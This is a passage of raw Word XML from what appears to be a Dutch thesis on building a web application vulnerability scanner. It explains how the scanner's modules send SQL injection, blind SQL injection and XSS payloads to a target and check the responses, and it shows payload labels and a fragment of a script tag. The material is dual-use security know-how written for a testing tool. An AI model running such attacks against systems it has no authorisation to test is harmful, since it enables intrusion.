      </w:pPr>
    </w:p>
    <w:p w14:paraId="5351F7F7" w14:textId="77777777" w:rsidR="00421E81" w:rsidRDefault="00421E81" w:rsidP="00681EF4">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BDB6F84" w14:textId="0B6F1FA1" w:rsidR="00421E81" w:rsidRPr="00E3495D" w:rsidRDefault="00421E81" w:rsidP="00681EF4">
      <w:r w:rsidRPr="00E3495D">
        <w:t>Figuur 4.11</w:t>
      </w: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E2204E" w:rsidRPr="00086ED5" w:rsidRDefault="00E2204E">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E2204E" w:rsidRDefault="00E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19"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" filled="f" strokecolor="#ffc100">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="2214A2C7" w14:textId="142FD5D7" w:rsidR="00E2204E" w:rsidRPr="00086ED5" w:rsidRDefault="00E2204E">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E2204E" w:rsidRDefault="00E2204E"/>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SecurityRapport. De anchor element bestaat uit een hyperlink en een parameter gekleurd in het oranje. </w:t>
      </w:r>
      <w:r w:rsidR="007466D5">
        <w:t xml:space="preserve">Deze twee elementen worden apart opgeslagen in hun eigen tabel (zie database model in Bijlage A). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE36847" w14:textId="00F7510E" w:rsidR="00B06DCC" w:rsidRDefault="00E3495D" w:rsidP="00681EF4">
      <w:r>
        <w:t>Figuur 4.12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777E6F16" w14:textId="68E93B62" w:rsidR="00E3495D" w:rsidRDefault="00E3495D">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252616704" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="32742852" wp14:editId="0C15BAD2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-14605</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>59563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E2204E" w:rsidRPr="00125A63" w:rsidRDefault="00E2204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E2204E" w:rsidRPr="00125A63" w:rsidRDefault="00E2204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E2204E" w:rsidRPr="00125A63" w:rsidRDefault="00E2204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E2204E" w:rsidRPr="00125A63" w:rsidRDefault="00E2204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E2204E" w:rsidRPr="00125A63" w:rsidRDefault="00E2204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20" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-1.15pt;margin-top:46.9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" filled="f" strokecolor="#ffc100">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="14F69644" w14:textId="4CE7DAB3" w:rsidR="00E2204E" w:rsidRPr="00125A63" w:rsidRDefault="00E2204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E2204E" w:rsidRPr="00125A63" w:rsidRDefault="00E2204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E2204E" w:rsidRPr="00125A63" w:rsidRDefault="00E2204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E2204E" w:rsidRPr="00125A63" w:rsidRDefault="00E2204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E2204E" w:rsidRPr="00125A63" w:rsidRDefault="00E2204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1A593B38" w14:textId="35A9D9A4" w:rsidR="00E3495D" w:rsidRDefault="00E3495D">
      <w:pPr>
        <w:sectPr w:rsidR="00E3495D" w:rsidSect="00241096">
          <w:headerReference w:type="default" r:id="rId65"/>
          <w:headerReference w:type="first" r:id="rId66"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:t>Figuur 4.13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B87230" w14:textId="76706698" w:rsidR="009276BC" w:rsidRDefault="00C15EE7" w:rsidP="00251301">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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36568"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5C826A8F" w:rsidR="008166B7" w:rsidRDefault="001074BF">
      <w:r>
        <w:t xml:space="preserve">In dit </w:t>
      </w:r>
      <w:r w:rsidR="000E476C">
        <w:t>deel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> zal ik </w:t>
      </w:r>
      <w:r w:rsidR="00BB19DC">
        <w:t>het concept van de Scanner ui</w:t>
      </w:r>
      <w:r w:rsidR="00582D8E">
        <w:t>tgebreid behandelen met als doel</w:t>
      </w:r>
      <w:r w:rsidR="00773B4A">
        <w:t xml:space="preserve"> om</w:t>
      </w:r>
      <w:r w:rsidR="00BB19DC">
        <w:t xml:space="preserve"> op een begrijpelijke manier uit te leggen hoe de Scanner in zijn werking gaat.</w:t>
      </w:r>
      <w:r w:rsidR="00914DCE">
        <w:t xml:space="preserve"> De Scanner is een fundamentele componenten van de </w:t>
      </w:r>
      <w:r w:rsidR="00CE31AF">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="00650BF0">
        <w:t>ebapplicatie scanner</w:t>
      </w:r>
      <w:r w:rsidR="006F77C7">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00D85FBA">
        <w:t>De Scanner is het component dat de gesimuleerde aanvallen verricht op het gekozen doelwit</w:t>
      </w:r>
      <w:r w:rsidR="00F74479">
        <w:t xml:space="preserve">.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Voordat ik begin met het behandelen van de soort data dat de Scanner gebruikt z</w:t>
      </w:r>
      <w:r w:rsidR="00FB17D4">
        <w:t>al ik eerst de basis uitleggen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198C2705" w14:textId="23FD0F65"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AAB81"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E2204E" w:rsidRPr="006D751D" w:rsidRDefault="00E2204E"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21"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" filled="f" strokecolor="#ffc000 [3207]" strokeweight="2.25pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="129E1887" w14:textId="6D6B5864" w:rsidR="00E2204E" w:rsidRPr="006D751D" w:rsidRDefault="00E2204E"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E2204E" w:rsidRPr="006D751D" w:rsidRDefault="00E2204E">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22"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" filled="f" strokecolor="#ffc000 [3207]" strokeweight="2.25pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3F9EC273" w14:textId="44A568CC" w:rsidR="00E2204E" w:rsidRPr="006D751D" w:rsidRDefault="00E2204E">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B3B8C"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E2204E" w:rsidRDefault="00E2204E">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>attackGet</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7BB266D1" w14:textId="45561940" w:rsidR="00E2204E" w:rsidRPr="005A5D92" w:rsidRDefault="00E2204E">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>attack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23"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" fillcolor="#ffc000 [3207]" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0AFFC00C" w14:textId="08F245F9" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>attackGet</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7BB266D1" w14:textId="45561940" w:rsidR="00E2204E" w:rsidRPr="005A5D92" w:rsidRDefault="00E2204E">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>attackPost</w:t>
                      </w:r>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E2204E" w:rsidRPr="00DF1918" w:rsidRDefault="00E2204E"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24"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" fillcolor="#ffc000 [3207]" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6BC77410" w14:textId="05947BBF" w:rsidR="00E2204E" w:rsidRPr="00DF1918" w:rsidRDefault="00E2204E"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E2204E" w:rsidRPr="00DF1918" w:rsidRDefault="00E2204E"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25"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" fillcolor="#ffc000 [3207]" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="2DCD4D9B" w14:textId="2F546F81" w:rsidR="00E2204E" w:rsidRPr="00DF1918" w:rsidRDefault="00E2204E"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E2204E" w:rsidRPr="00DF1918" w:rsidRDefault="00E2204E" w:rsidP="00DF1918">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Blind 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26"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" fillcolor="#ffc000 [3207]" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="156BE4F6" w14:textId="5546811A" w:rsidR="00E2204E" w:rsidRPr="00DF1918" w:rsidRDefault="00E2204E" w:rsidP="00DF1918">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Blind SQL Injecti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E2204E" w:rsidRPr="00DF1918" w:rsidRDefault="00E2204E" w:rsidP="00DF1918">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>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27"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" fillcolor="#ffc000 [3207]" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="17F90BC1" w14:textId="5565EA11" w:rsidR="00E2204E" w:rsidRPr="00DF1918" w:rsidRDefault="00E2204E" w:rsidP="00DF1918">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>SQL Injectie</w:t>
                      </w:r>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2A23D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442D5"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374872"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E2204E" w:rsidRPr="006343E2" w:rsidRDefault="00E2204E" w:rsidP="006343E2">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Aanval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28"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CE6W6GiQIAALwFAAAOAAAAAAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAI&#10;AAAAIQAnvqCM3wAAAAoBAAAPAAAAAAAAAAAAAAAAAOEEAABkcnMvZG93bnJldi54bWxQSwUGAAAA&#10;AAQABADzAAAA7QUAAAAA&#10;" fillcolor="#ffc000 [3207]" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="678DFF22" w14:textId="13ECB8C0" w:rsidR="00E2204E" w:rsidRPr="006343E2" w:rsidRDefault="00E2204E" w:rsidP="006343E2">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Aanval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63048">
        <w:t xml:space="preserve"> die de Webapplicatie scanner uitvoert. In het onderzoek (H3) ben ik tot de conclusie gekomen dat er in de scope van dit project maar drie aanval types feasible/haalbaar zijn, Blind SQLi, SQLi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5C681CD2" w:rsidR="00AE7ADA" w:rsidRDefault="00AF12F4">
      <w:r>
        <w:t>Figuur 4.15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E30DF9" w14:textId="77777777" w:rsidR="00B63048" w:rsidRDefault="00B63048">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="420471FB" w14:textId="18014D8C" w:rsidR="00245D9C" w:rsidRPr="00594305" w:rsidRDefault="001E678B" w:rsidP="00335A94">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:smallCaps/>
          <w:spacing w:val="10"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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02F7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78BD64C7"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8"/>
        <w:gridCol w:w="3536"/>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60118382" w:rsidR="00B17534" w:rsidRDefault="00145FDB" w:rsidP="00245D9C">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AF12F4">
        <w:t>Tabel 4.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C93D9D9" w14:textId="77777777" w:rsidR="00D42BAB" w:rsidRDefault="004C4F51" w:rsidP="00245D9C">
      <w:r>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dat het een reactie (Response) teruggeeft. Bij een succesvolle Blind SQLi aanval voor de server de Query uit en wacht het de zolang als is ingesteld door de hacker, de hacker weet dan dat de server kwetsbaar en gaat dan over naar de wat zwaardere aanvallen, de SQLi aanvallen. In figuur 4.19 woorden een aantal Blind SQLi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DE6E1"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E2204E" w:rsidRPr="00F364DD" w:rsidRDefault="00E2204E"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29"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" fillcolor="#ffd966" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="42FA5162" w14:textId="364792A7" w:rsidR="00E2204E" w:rsidRPr="00F364DD" w:rsidRDefault="00E2204E"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E2204E" w:rsidRPr="005A7556" w:rsidRDefault="00E2204E">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30"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GH2sfp5AgAAZgUAAA4A&#10;AAAAAAAAAAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAOQdverfAAAACgEA&#10;AA8AAAAAAAAAAAAAAAAA0QQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAADdBQAAAAA=&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="06BDA376" w14:textId="36E86AA4" w:rsidR="00E2204E" w:rsidRPr="005A7556" w:rsidRDefault="00E2204E">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A4A1"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9520"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B048"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2231"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90AA"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FDB9"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E4822"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4B6EA6CB" w:rsidR="00DF0FBB" w:rsidRPr="00D13927" w:rsidRDefault="00AF12F4" w:rsidP="00245D9C">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253206528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6F0193A8" wp14:editId="018AC94B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-137160</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4352925</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1333500" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="0" b="12700"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="791" name="Text Box 79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37D9A" w14:textId="4458EC6E" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:r>
                              <w:t>Figuur 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193A8" id="Text Box 791" o:spid="_x0000_s1131" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-10.8pt;margin-top:342.75pt;width:105pt;height:27pt;z-index:2532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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6C737D9A" w14:textId="4458EC6E" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:r>
                        <w:t>Figuur 4.15</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252738560" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1CF03183" wp14:editId="14D40153">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-267970</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2520950</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205504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="68412308" wp14:editId="299E8B01">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-327660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1038225</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="889000" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="790" name="Text Box 790"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="889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E72BF" w14:textId="424763B4" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:r>
                              <w:t>Figuur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12308" id="Text Box 790" o:spid="_x0000_s1132" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-25.8pt;margin-top:81.75pt;width:70pt;height:18pt;z-index:2532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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="717E72BF" w14:textId="424763B4" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:r>
                        <w:t>Figuur 4.14</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00B25291">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252724224" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="790B5D5E" wp14:editId="650CFA10">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43904107" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:r>
                              <w:t>Het controleren van de HTML pagina’s is voor ieder module anders. De SQL module controleert op database errors van meerdere DBMS.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33"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0B77B713" w14:textId="43904107" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:r>
                        <w:t>Het controleren van de HTML pagina’s is voor ieder module anders. De SQL module controleert op database errors van meerdere DBMS.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v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>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E2204E" w:rsidRDefault="00E2204E">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34"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="553DB931" w14:textId="325E9EB7" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">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1DBB"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E2204E" w:rsidRPr="00F364DD" w:rsidRDefault="00E2204E"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35"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" fillcolor="#ffd966" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="034EDC5A" w14:textId="65B03404" w:rsidR="00E2204E" w:rsidRPr="00F364DD" w:rsidRDefault="00E2204E"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w:lastRenderedPageBreak/>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7C910"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E2204E" w:rsidRPr="000070E1" w:rsidRDefault="00E2204E">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36"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="4220C711" w14:textId="2566770F" w:rsidR="00E2204E" w:rsidRPr="000070E1" w:rsidRDefault="00E2204E">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29FDA"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CB892"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1E5F"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2739"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265C"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78DE"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E2204E" w:rsidRPr="00F364DD" w:rsidRDefault="00E2204E"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37"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BVgtYVmAIAALsFAAAOAAAAAAAAAAAAAAAAACwCAABkcnMvZTJvRG9j&#10;LnhtbFBLAQItABQABgAIAAAAIQATIlXB3wAAAAsBAAAPAAAAAAAAAAAAAAAAAPAEAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABADzAAAA/AUAAAAA&#10;" fillcolor="#ffd966" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="2D557B24" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRPr="00F364DD" w:rsidRDefault="00E2204E"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831B6"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E2204E" w:rsidRPr="00F364DD" w:rsidRDefault="00E2204E"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38"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" fillcolor="#ffd966" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1CFA18AD" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRPr="00F364DD" w:rsidRDefault="00E2204E"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C15F4"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B7EC"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E2204E" w:rsidRPr="005A7556" w:rsidRDefault="00E2204E"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39"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="53A49A76" w14:textId="5B77F94A" w:rsidR="00E2204E" w:rsidRPr="005A7556" w:rsidRDefault="00E2204E"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481E8349" w:rsidR="0083347D" w:rsidRDefault="00AF12F4">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253207552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="559F513F" wp14:editId="680E764A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-327660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>198755</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1079500" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="793" name="Text Box 79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6A6CD" w14:textId="0DDCE906" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:r>
                              <w:t>Figuur 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F513F" id="Text Box 793" o:spid="_x0000_s1140" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-25.8pt;margin-top:15.65pt;width:85pt;height:18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48pXsCAABm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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5016A6CD" w14:textId="0DDCE906" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:r>
                        <w:t>Figuur 4.16</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="22731BEB" w14:textId="77777777" w:rsidR="00AF12F4" w:rsidRDefault="00AF12F4"/>
    <w:p w14:paraId="42B7852D" w14:textId="7B26DCCF" w:rsidR="008713C1" w:rsidRDefault="0040697D">
      <w:r>
        <w:t>Voor de XSS module is er geen voor gedefinieerde lijst met Javascript code regels, omdat je niet te maken hebt met gestandaardiseerde teksten zoals bij SQL die bij een error een bericht toont maar wat Javascript wel kan is script runnen. Met andere woorden er kan Javascript code verstuurd worden naar de server die het dan verwerkt. Zoals er in Hoofdstuk 3.2.2 behandeld wordt kunnen er HTML elementen script “&lt;script&gt;” geplaatst worden op een HTML pagina. Tussen twee van deze elementen kan Javascript code geplaatst worden dat door de server wordt uitgevoerd. De XSS module gebruikt deze feature om zelf opmaat gemaakte XSS script op de HTML pagina van de doelwit te plaatsen. XSS module maakt gebruik van een payload, deze bevat een lijst met XSS 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311AC463" w:rsidR="00C373D1" w:rsidRPr="0083347D" w:rsidRDefault="00AF12F4">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253208576" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6AECCD40" wp14:editId="4594B858">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-332740</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1461770</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="952500" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="794" name="Text Box 79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93177" w14:textId="6ABFAC8F" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:r>
                              <w:t>Figuur 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CD40" id="Text Box 794" o:spid="_x0000_s1141" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-26.2pt;margin-top:115.1pt;width:75pt;height:18pt;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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="08D93177" w14:textId="6ABFAC8F" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:r>
                        <w:t>Figuur 4.18</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="008E11B4">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E2204E" w:rsidRPr="0095104D" w:rsidRDefault="00E2204E">
                            <w:pPr>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="0095104D">
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                <w:b/>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42"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0F84FDFA" w14:textId="50D59D8C" w:rsidR="00E2204E" w:rsidRPr="0095104D" w:rsidRDefault="00E2204E">
                      <w:pPr>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="0095104D">
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                          <w:b/>
                        </w:rPr>
                        <w:t>&lt;scrip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B1D1"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6892"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8963"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5664"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16DA"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CC535"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6D478"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E2204E" w:rsidRPr="00F364DD" w:rsidRDefault="00E2204E"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43"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" fillcolor="#ffd966" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="41C3504B" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRPr="00F364DD" w:rsidRDefault="00E2204E"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E2204E" w:rsidRPr="005A7556" w:rsidRDefault="00E2204E"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44"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="55C10132" w14:textId="5E102CCF" w:rsidR="00E2204E" w:rsidRPr="005A7556" w:rsidRDefault="00E2204E"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C975"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D2F94"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E2204E" w:rsidRPr="00F364DD" w:rsidRDefault="00E2204E"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45"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" fillcolor="#ffd966" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0CEBCE6A" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRPr="00F364DD" w:rsidRDefault="00E2204E" w:rsidP="00897DA6">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:sz w:val="16"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00F364DD">
                        <w:rPr>
                          <w:sz w:val="16"/>
                        </w:rPr>
                        <w:t>HTTP Request</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t>Figuur 4.17</w:t>
      </w:r>
      <w:r w:rsidR="0083347D">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
